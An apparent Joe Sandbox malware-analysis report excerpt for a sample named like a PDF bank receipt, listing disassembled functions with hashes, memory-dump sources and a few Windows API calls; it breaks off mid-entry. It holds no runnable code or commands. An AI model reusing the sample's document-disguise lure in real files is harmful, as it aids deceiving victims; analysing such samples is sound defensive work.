                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LR]q
                                                                                                                • API String ID: 0-3081347316
                                                                                                                • Opcode ID: 7bd8ef60c91d34ffcf4e343e19d518ab8f5b084ffa9738d3f25b9ac5a11c7795
                                                                                                                • Instruction ID: 8f4c07c91f16ea0fc990b00e2c44f5550a0d0f7835856552bb69454c2d726a67
                                                                                                                • Opcode Fuzzy Hash: 7bd8ef60c91d34ffcf4e343e19d518ab8f5b084ffa9738d3f25b9ac5a11c7795
                                                                                                                • Instruction Fuzzy Hash: 9552C874A01219DFCB64DF24E994A9DBBB2FF48301F5085A9D809A7368DF785E85CF80
                                                                                                                Function 0147A4E0 Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o]q
                                                                                                                • API String ID: 0-794736227
                                                                                                                • Opcode ID: 18941e1196d6269af5a49485cb064af68c8c5040661cc4dc8e40e13abdf9d8c7
                                                                                                                • Instruction ID: de6efaa67224907cfcac08c64519f4eb580d47d9da0bf91cf74b4e0434e2dbd0
                                                                                                                • Opcode Fuzzy Hash: 18941e1196d6269af5a49485cb064af68c8c5040661cc4dc8e40e13abdf9d8c7
                                                                                                                • Instruction Fuzzy Hash: AE02307160020ADFCB15DF68C684AAEBBF6BF88310F298956E4059B3B5D734ED81CB51
                                                                                                                Function 06D17390 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D1735E,?,?,?,?,?), ref: 06D1741F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: feb6d49d75d20cd4e62eedf9b0436a0e34f40ad6bcafe1e77d0638180b52454d
                                                                                                                • Instruction ID: 2d73cd98dd97e7a873ef439b1012c46874461227ee217bf5cf56997362448073
                                                                                                                • Opcode Fuzzy Hash: feb6d49d75d20cd4e62eedf9b0436a0e34f40ad6bcafe1e77d0638180b52454d
                                                                                                                • Instruction Fuzzy Hash: 7B21E7B5901208AFDB10CFA9D584ADEBFF8EB48310F14841AE958A7310D378A954CFA5
                                                                                                                Function 06D16F9C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06D1735E,?,?,?,?,?), ref: 06D1741F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: ab5d76516f302e2315a42c4656db8ce5e3b92990d3097aa35031146637692528
                                                                                                                • Instruction ID: a9b2384708007885f6f04371df65e6abc33c0434d09c0563aac0b6eb59c24c40
                                                                                                                • Opcode Fuzzy Hash: ab5d76516f302e2315a42c4656db8ce5e3b92990d3097aa35031146637692528
                                                                                                                • Instruction Fuzzy Hash: AF21E5B5900218AFDB10CFAAD584AEEBFF4EB48310F14841AE918A7310D378A954CFA4
                                                                                                                Function 06D19070 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 06D190E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumThreadWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2941952884-0
                                                                                                                • Opcode ID: a5287478e58f51c385c8931c3f6b4951e3249c104694988540df6e75f9a11426
                                                                                                                • Instruction ID: cb8a81a3766e8638600732d8b5cc67b1e0ed2817e6ec93e9f64db27babcf4a95
                                                                                                                • Opcode Fuzzy Hash: a5287478e58f51c385c8931c3f6b4951e3249c104694988540df6e75f9a11426
                                                                                                                • Instruction Fuzzy Hash: B6214971D002099FDB14CFAAC854BEEFBF5FB88310F14842AE458A7240D778A945CFA5
                                                                                                                Function 06D19400 Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 06D19485
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID:
                                                                                                                • API String ID: 2030045667-0
                                                                                                                • Opcode ID: f9b7a3ba2ac21b1008c75631f8bf82f528432120627b5239296bc5c3ee11e293
                                                                                                                • Instruction ID: 7470fb37608231adae05f9465f17ee36a4a30a84056684ab072e28b173e9340d
                                                                                                                • Opcode Fuzzy Hash: f9b7a3ba2ac21b1008c75631f8bf82f528432120627b5239296bc5c3ee11e293
                                                                                                                • Instruction Fuzzy Hash: 802104B5C01309AFDB10CF9AD894ADEFBF5FB48310F10841AE828AB200C379A544CBA5
                                                                                                                Function 06D19078 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 06D190E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumThreadWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2941952884-0
                                                                                                                • Opcode ID: 84817967d35dc8bd09971099203e4fed0a3591f8b15f4b030a4885bcc02eb54a
                                                                                                                • Instruction ID: 1dccf710ba9b2b4ffc6eae83deca39f921677c9f3923a5569494dd936bc606d7
                                                                                                                • Opcode Fuzzy Hash: 84817967d35dc8bd09971099203e4fed0a3591f8b15f4b030a4885bcc02eb54a
                                                                                                                • Instruction Fuzzy Hash: 52213871D002099FDB14DF9AC844BEEFBF5FB88310F14842AD458A7250D778A945CFA5
                                                                                                                Function 06D19408 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 06D19485
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID:
                                                                                                                • API String ID: 2030045667-0
                                                                                                                • Opcode ID: 8a596c0a8b4f6076012be0c6bc4a3f1d39f0382391565adc2fcaafa763decae9
                                                                                                                • Instruction ID: ae4c1dd35ea8f2ffbf82594789d2fd8689755e6789ab27e970338d707f9f3e0e
                                                                                                                • Opcode Fuzzy Hash: 8a596c0a8b4f6076012be0c6bc4a3f1d39f0382391565adc2fcaafa763decae9
                                                                                                                • Instruction Fuzzy Hash: 6621E3B5D013499FDB14CF9AD894ADEFBF5FB48310F10852EE528AB200C3B5A544CBA5
                                                                                                                Function 06D181C0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 06D1821D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 0aaea5fe5135a559e62760d416ad8075173d64632bb298735036aa982a38d8af
                                                                                                                • Instruction ID: 85234b7166c5799f504d0e95e0951830adae8d7cbd7f1eb1366d494f21c6509a
                                                                                                                • Opcode Fuzzy Hash: 0aaea5fe5135a559e62760d416ad8075173d64632bb298735036aa982a38d8af
                                                                                                                • Instruction Fuzzy Hash: 2F1103B5C006489FCB20DF9AD549BDEBBF8AB48310F208459E918A7300D378A584CFA5
                                                                                                                Function 06D17B10 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 06D1821D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4506530175.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6d10000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 91c9475fbdc0a194a359b60e5c3f17b29de23b959941d4931ef35b0b9beeb0ef
                                                                                                                • Instruction ID: e6174542830060db69a08a0060ac75a9df2c7efe2c8ab14f9cb885fd4cc4d2db
                                                                                                                • Opcode Fuzzy Hash: 91c9475fbdc0a194a359b60e5c3f17b29de23b959941d4931ef35b0b9beeb0ef
                                                                                                                • Instruction Fuzzy Hash: 431118B18007489FDB20DF9AD548BDEBBF4EB48310F108459D519A7300C3B8A544CFA5
                                                                                                                Function 0147AEFF Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (o]q
                                                                                                                • API String ID: 0-794736227
                                                                                                                • Opcode ID: 5097c902f2e6d28b161a87035ba34aac9405579dd9af773b513859b0257990e2
                                                                                                                • Instruction ID: e05f1ba6a3c33851e4516e162c4a3beca27cf659d855a3207530891c487f5b64
                                                                                                                • Opcode Fuzzy Hash: 5097c902f2e6d28b161a87035ba34aac9405579dd9af773b513859b0257990e2
                                                                                                                • Instruction Fuzzy Hash: 9741D0717002448FCB199F69D8546AEBFF6AFC8620F1884AAE916D73A5CE719C01CB90
                                                                                                                Function 0147AA97 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q
                                                                                                                • API String ID: 0-1259897404
                                                                                                                • Opcode ID: 2841cdb28488eb595b935ef88f2592c177ce748354e16faae87673cce668f47c
                                                                                                                • Instruction ID: b822275de210f48d943f045c0e7e4d6b59f82102e4b77608778d3b6781f188ee
                                                                                                                • Opcode Fuzzy Hash: 2841cdb28488eb595b935ef88f2592c177ce748354e16faae87673cce668f47c
                                                                                                                • Instruction Fuzzy Hash: AF4116746002159FCB15DF28D988ABE7BB6BF88310F24446AFA169B3B1CB749C41CB91
                                                                                                                Function 0147E017 Relevance: .6, Instructions: 647COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1297e5ebd730b4e8db2358d78e58de4ba246cd49e8abeec6763935b8c785e02d
                                                                                                                • Instruction ID: cdfd259177084a047dc4604fc4cc8813f30e9240c88666ffee7a548cc87737a1
                                                                                                                • Opcode Fuzzy Hash: 1297e5ebd730b4e8db2358d78e58de4ba246cd49e8abeec6763935b8c785e02d
                                                                                                                • Instruction Fuzzy Hash: 851281744253468FA7A02F30E6AC16EBA61FB0F377354EC95F00FC5459AFB116898B62
                                                                                                                Function 0147E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae5be09f929d24ab1e61fe96997e0021fc586f4c6ba8ce0608ed2855ab0d4ba7
                                                                                                                • Instruction ID: 60ce0c8ca14fb2b37f9fdf9db2fca85ef185a400016a21d55cf5bb740b226bf1
                                                                                                                • Opcode Fuzzy Hash: ae5be09f929d24ab1e61fe96997e0021fc586f4c6ba8ce0608ed2855ab0d4ba7
                                                                                                                • Instruction Fuzzy Hash: 521291740253468FA3A02F30E6AC16ABA65FB0F377354EC95F00FC5459AFB116898B62
                                                                                                                Function 0147A0F8 Relevance: .2, Instructions: 215COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7979d980191676c52076a60c69075457f5e6ed825860cac0dc7842ef542e4fbe
                                                                                                                • Instruction ID: 6eb338f81807e0349ee068a92e20cd59879b4de979379920654196e87b8c1451
                                                                                                                • Opcode Fuzzy Hash: 7979d980191676c52076a60c69075457f5e6ed825860cac0dc7842ef542e4fbe
                                                                                                                • Instruction Fuzzy Hash: 5191BA74A00259CFCF16CF98C4848EEBFB2FF88310F28856AE805AB365D771A955CB50
                                                                                                                Function 014780D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9584ef6cafa7076835b64dac83dd7abae3fdbd10f6163698925336efe4f0f5a8
                                                                                                                • Instruction ID: 122aa30f5daaee124f0a59b29bb915ac85672d7211e89abc584a129d5ddd69dc
                                                                                                                • Opcode Fuzzy Hash: 9584ef6cafa7076835b64dac83dd7abae3fdbd10f6163698925336efe4f0f5a8
                                                                                                                • Instruction Fuzzy Hash: 0A713C347006068FDB25DF6CC888AAE7BE6EF99251B1540AAE905DB3B1DB70DC41CB51
                                                                                                                Function 0147F3FB Relevance: .1, Instructions: 147COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e7f86381a6c073d4a0f358d51588c194c2a03e94b7b128c6271b18588852519
                                                                                                                • Instruction ID: 4122e2e77ba6f030dac2b67a26ed2de8dbc7322ca9dd31afbd6f6e936017f328
                                                                                                                • Opcode Fuzzy Hash: 1e7f86381a6c073d4a0f358d51588c194c2a03e94b7b128c6271b18588852519
                                                                                                                • Instruction Fuzzy Hash: 36510074D01318CFDB14DFA5D954AAEBBB2FF88300F208529D809AB3A5DB79594ACF41
                                                                                                                Function 0147419F Relevance: .1, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 49f2791cd2237367046ea063022f0f1e925262631705b4913d7f41f23d732f19
                                                                                                                • Instruction ID: 0a9336909010982e58a46a7aa9f3c08b4101b51e653e8157c10bfc9df3396722
                                                                                                                • Opcode Fuzzy Hash: 49f2791cd2237367046ea063022f0f1e925262631705b4913d7f41f23d732f19
                                                                                                                • Instruction Fuzzy Hash: F6519074E01208DFCB58DFA9D58499DBBB2FF89310B208569E809BB364DB35AD42CF51
                                                                                                                Function 014741A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6197eaad449960e5c6dcab6c1def3ea013b4f62e8734e8640776f94b93141c17
                                                                                                                • Instruction ID: 9d67675139bb4fe4a1cea04d3b13920d761f9c203f4345f31d48f265cdc1aa70
                                                                                                                • Opcode Fuzzy Hash: 6197eaad449960e5c6dcab6c1def3ea013b4f62e8734e8640776f94b93141c17
                                                                                                                • Instruction Fuzzy Hash: 15518174E01208DFCB18DFA9D58499DBBB2FF89310B209569E809BB364DB35AD42CF51
                                                                                                                Function 0147D557 Relevance: .1, Instructions: 133COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad592dfcde8bf9a8697df8162a0e66bd233cda7f8665b94a7a1e98c3ef028cea
                                                                                                                • Instruction ID: ef216992b4a468424a1e57205ed193c6db0ef10c8b53213f1b7e72bf69b50f50
                                                                                                                • Opcode Fuzzy Hash: ad592dfcde8bf9a8697df8162a0e66bd233cda7f8665b94a7a1e98c3ef028cea
                                                                                                                • Instruction Fuzzy Hash: 57515374E01218DFDB58DFAAD58499DBBF2FF89310F24816AE819AB365DB319901CF10
                                                                                                                Function 01479C30 Relevance: .1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ecff933b5325fb2fbce3aefa2e92f626b8742b5369ed69218bdaab39303a8406
                                                                                                                • Instruction ID: a8dd777cc825a0832090c0be22e9c696742ec2035ab6c18a3aa6e65d6f86fcaf
                                                                                                                • Opcode Fuzzy Hash: ecff933b5325fb2fbce3aefa2e92f626b8742b5369ed69218bdaab39303a8406
                                                                                                                • Instruction Fuzzy Hash: A9314C30700245CFDB11CF6CC844BAA7BE6EB89329F548466E918CB36AD775DD42CB51
                                                                                                                Function 01475658 Relevance: .1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cec649a3d5a78ca1138143418a472f57c458ad80e673e422d8903acce7db501c
                                                                                                                • Instruction ID: 522396349d13a968e323501a75cd941d433d5b594032af6fc18c8d9d53ebe648
                                                                                                                • Opcode Fuzzy Hash: cec649a3d5a78ca1138143418a472f57c458ad80e673e422d8903acce7db501c
                                                                                                                • Instruction Fuzzy Hash: 16318F316042099FCF519F65E854ABF7BA2FB58220F10842AF9199F368CB79CD21CB90
                                                                                                                Function 01478380 Relevance: .1, Instructions: 87COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 750c090d6ccb24dd965fce644a99cdd6d27a8c0c8be29ea9114b90d5b430ae52
                                                                                                                • Instruction ID: 04cf060d16b0487bec9e12acc2d2d557449368beee24938e87f75b74ced05374
                                                                                                                • Opcode Fuzzy Hash: 750c090d6ccb24dd965fce644a99cdd6d27a8c0c8be29ea9114b90d5b430ae52
                                                                                                                • Instruction Fuzzy Hash: 612171313042024BDB265A29845C6BF769BAFC465CF14847ED506CB7BAFAF5CC42D781
                                                                                                                Function 0147A3E7 Relevance: .1, Instructions: 86COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 876b03f8b927ec68c22e94a966733ded18d3c3ddb0480d592e55ff5997f034a8
                                                                                                                • Instruction ID: 28e8431806f0191f40b2ce3bd39d3d842d34557346e308c5c2c623330ad265f6
                                                                                                                • Opcode Fuzzy Hash: 876b03f8b927ec68c22e94a966733ded18d3c3ddb0480d592e55ff5997f034a8
                                                                                                                • Instruction Fuzzy Hash: 6531C731600245DFCB21CF2CC848BAEBFB1AF85310F1985AAE5599B3B2D372E844CB51
                                                                                                                Function 0147837F Relevance: .1, Instructions: 83COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 15f64252fb8d31e784f9a4786d4fbbae88ba0e763269c25cfea6cfbf9d6d106d
                                                                                                                • Instruction ID: c3ef4757d2cda5f8e6650b1f8bac3f5a251a1230ba41af7ec7b269c5d161add1
                                                                                                                • Opcode Fuzzy Hash: 15f64252fb8d31e784f9a4786d4fbbae88ba0e763269c25cfea6cfbf9d6d106d
                                                                                                                • Instruction Fuzzy Hash: B02165313002128B9B265B69845CABF769BAFC465D714847ED506CB37AFAB5CC02D781
                                                                                                                Function 014728F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a6ebdb3f5ba3b990da8360fefea0ed241c295bb62ad66edce01e8122de96d4b
                                                                                                                • Instruction ID: 46c0d1237a8caf9fd4e5b32b76a1948aa3cb616f06a4db46461637ebd724155e
                                                                                                                • Opcode Fuzzy Hash: 1a6ebdb3f5ba3b990da8360fefea0ed241c295bb62ad66edce01e8122de96d4b
                                                                                                                • Instruction Fuzzy Hash: 3921BD71B00105AFCB14CF68C8409EF37A5EB9D2A4B14C42AD80A9B350DB34EE4BCBD2
                                                                                                                Function 0141D554 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500035962.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_141d000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6aa20537be51f8ebb25ff5abc0e70077192f0207b6cf8e0e4ac287522fe3988d
                                                                                                                • Instruction ID: 157d2c8a07ef7703c3a463cc57490bbbc9b266d3585936abd4f821e60ee279f6
                                                                                                                • Opcode Fuzzy Hash: 6aa20537be51f8ebb25ff5abc0e70077192f0207b6cf8e0e4ac287522fe3988d
                                                                                                                • Instruction Fuzzy Hash: 8F21F4B1904240DFDB05DF98D9C4F27BF65FB88314F20856AE9090A26AC33AD416CAA1
                                                                                                                Function 01476300 Relevance: .1, Instructions: 74COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4500304474.0000000001470000.00000040.00000800.00020000.00000000.sdmp, Offset: 01470000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1470000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d046fdf3d3f33db2e7b872c43b3ea45d6380303f5227a0f78ed5e6ebaa6cbd6e
